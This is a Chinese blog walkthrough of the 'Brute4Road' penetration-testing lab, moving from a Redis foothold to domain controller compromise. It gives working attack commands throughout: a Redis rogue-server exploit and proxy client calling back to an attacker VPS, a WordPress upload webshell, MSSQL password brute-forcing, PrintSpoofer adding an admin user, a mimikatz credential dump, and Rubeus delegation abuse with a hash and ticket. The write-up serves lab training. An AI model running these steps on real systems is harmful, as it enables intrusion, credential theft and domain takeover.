首页 > 其他分享 >春秋云镜 Brute4Road

春秋云镜 Brute4Road

时间:2024-08-20 13:50:10浏览次数:4  
标签:__ 春秋 Brute4Road 云镜 flag 2.3 2.16 open 172.22

先用fscan扫一下内网
image

尝试打redis主从

python3 redis-rogue-server.py --rhost 39.98.122.75 --lhost 123.57.23.40 

image

需要在vps下使用,选择r,然后输入要反弹的ip,port
使用pty获得交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

尝试UID提权

find / -user root -perm -4000 -print 2> result.txt

image

发现可以进行base64提权

base64 "/home/redis/flag/flag01" | base64 --decode

成功得到flag1:flag{5207b714-21b2-47c9-a4d1-c7e2c0d4ff2b}
挂个nps横向代理.注意:要在后台运行nps client

nohup ./npc -server=123.57.23.40:8024 -vkey=8lwmthurrb31pz4j &

传一个fscan去扫描内网.

[redis@centos-web01 fscan]$ ./fscan -h 172.22.2.0/24
./fscan -h 172.22.2.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.34     is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.18     is alive
[*] Icmp alive hosts len is: 5
172.22.2.3:88 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.7:6379 open
172.22.2.16:445 open
172.22.2.16:1433 open
172.22.2.18:445 open
172.22.2.3:445 open
172.22.2.34:445 open
172.22.2.18:139 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:139 open
172.22.2.34:135 open
172.22.2.3:135 open
172.22.2.16:135 open
172.22.2.16:80 open
172.22.2.18:80 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo 
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] NetInfo 
[*]172.22.2.3
   [->]DC
   [->]172.22.2.3
[*] WebTitle http://172.22.2.16        code:404 len:315    title:Not Found
[*] NetInfo 
[*]172.22.2.34
   [->]CLIENT01
   [->]172.22.2.34
[*] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[*] WebTitle http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] OsInfo 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[*] OsInfo 172.22.2.3   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.3      [+] DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[+] ftp 172.22.2.7:21:anonymous 
   [->]pub
[*] WebTitle http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点
已完成 20/20
[*] 扫描结束,耗时: 12.221584075s

这个172.22.2.18是个wordpress,应该有些说法.
扫一下这个wordpress

proxychains wpscan --url http://172.22.2.18

image

存在wpcargo插件.这个插件是有漏洞的,使用网上的脚本去打.
image

成功的进行了文件上传.
image

写个马,然后用蚁剑连/wp-content/1.php
没找到flag,猜测在数据库中
image

在wp-config中找到数据库的用户名和密码
wpuser/WpuserEha8Fgj9
使用蚁剑登录数据库,成功得到第二个flag
flag:flag{c757e423-eb44-459c-9c63-7625009910d8}
image

然后在数据库中找到了一个弱密码本
172.22.2.16是MSSQLSERVER,而且开启了1433端口,因此我们使用弱密码本去远程爆一下密码.

proxychains ./fscan -h 172.22.2.16 -m mssql -pwdf 1.txt

得到了用户名和密码为sa/ElGNkOiC
使用MDUT去进行远程登录.
激活一下ole组件
image

然后传一个PrintSpoofer去进行提权.
image

发现成功的得到了system权限
查看网络情况
image

发现开启了3389rdp服务
我们创一个用户,并将其添加为管理员

C:/迅雷下载/PrintSpoofer64.exe -i -c "net user lbz lbz041130 /add"
C:/迅雷下载/PrintSpoofer64.exe -i -c "net localgroup administrators lbz /add"

然后使用mstsc进行远程登录,得到第三个flag
image

flag:flag{69fcc194-e581-4e82-9b08-f01aa4215037}
查看systeminfo发现已经在域内了,上传一个mimikatz去进行信息搜集
尝试进行DCsync命令,发现打不了,尝试抓取本地用户密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

image

NTLM:418259c32d6af8f64d9a896110889b20
传一个Rubeus去打约束委派
请求一个TGT

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:418259c32d6af8f64d9a896110889b20 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

image

doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE24zBpjW3nT+m8M8EFq+pklNIbGJ4NAh5i0gs/CEbGAao12nO+5nnynBvwVpiWGJVU2qhmKJn+J3U5J5lefRsvkgpbEf6lSeenAU1pQPvwPGBUm14QuRimv2n14JM0a2g8PhUH8Z6V8069RQHDfgbVEIDHtGNNriB6INo5Q6fvWR3XaGkCLLgfn3byi0SAfs7msaaYJdzF+muJZ2PNaa98jZwJxw+BYIrHeSr46Q3/dllxgcQ5LplxXDyh3ELCE7luoFMjgGl0u9wKHRc/fMqI8FKABxvlKFhl1vkdoDpbttrhVhybb3UbqtXThMOoNWcNLcUOdnz41/+eqP5P3mQz0OZz5Xjry/j2CSLpVuVqt0a4u/KjnoPLj/sBCRpTwc97JdCawqKpgHf+Mey7hGq1uQDQPwAi/0E4GMdjJlY+53tMFfiM1zFn+6dIdhjOCDaCE2jnHGrSSXKjfQtOQ46peSeTJev7U8Bvws+RPusCI1PcUO9hKh7aZuMWvoE1+/ikO8ObDAAW5hlvht0GJZu0LA1OnLx8vvdJBHUs6DGNKxNiWKjoDlIMZvQs6Gdkxt0a1GAuiM90TuiD9f1g0SvattwqQgDk3JFnbSfhsneCCC/KtcyrxGh110BCdVJIvAAil0hGyZpNnR3QxPQVE40lvJhMfz2dqDBCjOzA6ZIyB/D4/+mzIcP6Q28/y13jsOyIra8n5zovHf5EfLlRO5u0tjs6Pk75damT2gENgQI0d8NB1+fjv2Mo1gH+VcALN8bhE3Dsn8kZMYNPl4dDTNB3v5gTOta/IvDc5aguSUVawWQaJry98S9Ei+Nv7v84UNuG7Zf07nVzQzh2srjz9ZlP2hmIcaqUyt5EZO4/TKAkWdK967jvDOCWgg9ULA4vRgQR9d6pl+mv61cv8fAVoVBLKDm65TtJodDbBAnFZhahFLnXEtAFPBBCVbQV0GY/3+5gyYlENePu88Bgr/+tSFvmZdHnVkeCqeSK+3EYElPd3wV0T3b4vGHjOUvMWaUueD3bKgnZQ8a2UWFHguFS+CGCZi/dDiIqp6oZT+8CcpMAja1oQGvxeJCXqna2pqYELePbnHA6jAJv2tNFh1nku7kRFg0M5q4IpGmm1uD47jiX8Z73y2zxDNNZo10FdSWWtD2/Mob70CPF4TtKREh77ydqxfgWSsEybS6sXxvIjFCjsjinKV7Izs3FU9nLyKQSyhbbZLm5jxSDF0V2IKd7YgvMNMySGtcWmECG60z8X9fdWD1DbwFWyRldtif6W3J0+VZdCOR/zf+440YI9PcV/gkJiCBzSNmnlfn0RtpFbe8b3052joJAvE1JEZfEZ4Vf+p/amaQxIA8rZT+uIWJ6MoEXDaFI81/8G5A+cMBnkiioNUDriDd2OJB6XcUBpwPiTyUQI09RgXX/BZbPilmXlQ9poMkgWhG9sv68qEv07er/dN2gf7zWBCYixujmA/vajgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAZ70HRRMeesCyNbiuS36CRoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDgyMDAyMzEzMFqmERgPMjAyNDA4MjAxMjMxMzBapxEYDzIwMjQwODI3MDIzMTMwWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

然后去伪造一个来自域管理员的ST进行注入

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:上面抓到的服务票据

然后就可以直接去读flag了

type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt

flag: flag{1aac0c8b-f598-4344-8544-825240935d4a}

共用时3小时22分钟,其中在入口机的redis主从复制处卡了一会,一是因为没打过,二是因为这东西属实不稳定.然后在蚁剑链接以及蚁剑连数据库处卡了一会,然后MDUT中途还似了...最后在抓取本机密码去进行约束委派的时候又卡了一会,因为网上博客都没说如何查看委派关系.为什么这个MSSQLSERVER 配置了到域控的约束委派没有人去解释.不过有一说一,学过理论后,再看打域控的部分确实顺利了很多.
image

标签:__,春秋,Brute4Road,云镜,flag,2.3,2.16,open,172.22
From: https://www.cnblogs.com/meraklbz/p/18369316

相关文章

  • 春秋云镜 time
    先用fscan扫一下,得到了下面的端口挨个尝试,访问7473发现是个neo4j的服务.这个neo4j的server只出现过这一个历史漏洞我们在网上下载jar漏洞利用文件,然后在本地运行.注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误运行命令java-jar.\rhino_gadget......
  • 春秋云镜 tsclient
    入口机给了个ip首先用fscan扫一下看看发现存在mysql远程登录,弱口令都扫出来了.使用MDUT进行远程登录登录以后上传cs马,选(s)这个.注意要上传到C:/Users/Public/,因为public文件夹通常有写的权限然后执行命令C:/Users/Public/beacon.exe回到cs中成功得到shell调整休眠时......
  • 春秋云境 | 逻辑漏洞 | CVE-2022-23134
    目录靶标介绍开启靶场获取flag靶标介绍ZabbixSiaZabbix是拉脱维亚ZabbixSIA(ZabbixSia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix存在安全漏洞,该漏洞源于在初始设置过程之后,setup.php文件的某些步骤不仅可以由超级......
  • 春秋云境 | 逻辑漏洞 | CVE-2020-13933
    靶标介绍<p>ApahceShiro由于处理身份验证请求时出错存在权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。</p>开启靶场发现不管拿点哪里都是登录页面,发现登录框那里写着flag在/admin里访问之后并没有反应,在后......
  • 春秋云境 | RCE | CVE-2022-25578
    目录靶标介绍开启靶场蚁剑连接获取flag 靶标介绍taocmsv3.0.2允许攻击者通过编辑.htaccess文件执行任意代码开启靶场点击下面的管理发现是一个登录页面,默认用户名是admin密码是tao登录上来之后,进入到文件管理,编辑.htaccess文件,插入下面这条代码SetH......
  • 春秋云境 | RCE | CVE-2019-12422
    目录靶标介绍开启靶场漏洞利用靶标介绍ApacheShiro是美国阿帕奇(Apache)软件基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。ApacheShiro1.4.2之前版本中存在安全漏洞。当ApacheShiro使用了默认的‘记住我’配置时,攻击者可利用该漏洞对cookies实施......
  • 春秋云镜CVE-2023-38836
    打开靶场环境点击发现一个登陆框,弱口令试一下发现账号密码为admin,password随便点击点击Media发现这里可以上传文件上传木马试试<?php@eval($_POST["wjq"]);?>发现不能上传php文件php内容修改他的格式抓包绕过一下302就可以其实已经写进去了点一下4......
  • CVE-2019-12422~shiro反序列化【春秋云境靶场渗透】
    #今天我们来攻克CVE-2019-12422春秋云境这个靶场漏洞当我们知道了该靶场是shiro反序列化漏洞,所以直接用工具梭哈好小子,离成功又近一步!!!......
  • CVE-2023-38633~XXE注入【春秋云境靶场渗透】
    今天我们来攻克春秋云境CTF的CVE-2023-38633#我们通过抓包来构造POC来查找/etc/passwd<?xmlversion="1.0"encoding="UTF-8"standalone="no"?><svgwidth="1000"height="1000"xmlns:xi="http://www.w3.org/2001/XInclude&......
  • 春秋云境 | 文件上传 | CVE-2022-29464
    靶标介绍WSO2文件上传漏洞(CVE-2022-29464)是OrangeTsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。开启靶场先到国家信息安全漏洞库查看一下这个漏洞的相关信息利用......